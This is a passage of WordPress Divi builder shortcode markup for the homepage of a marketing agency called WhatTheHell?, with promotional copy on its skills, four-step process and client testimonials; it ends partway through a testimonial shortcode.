animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" 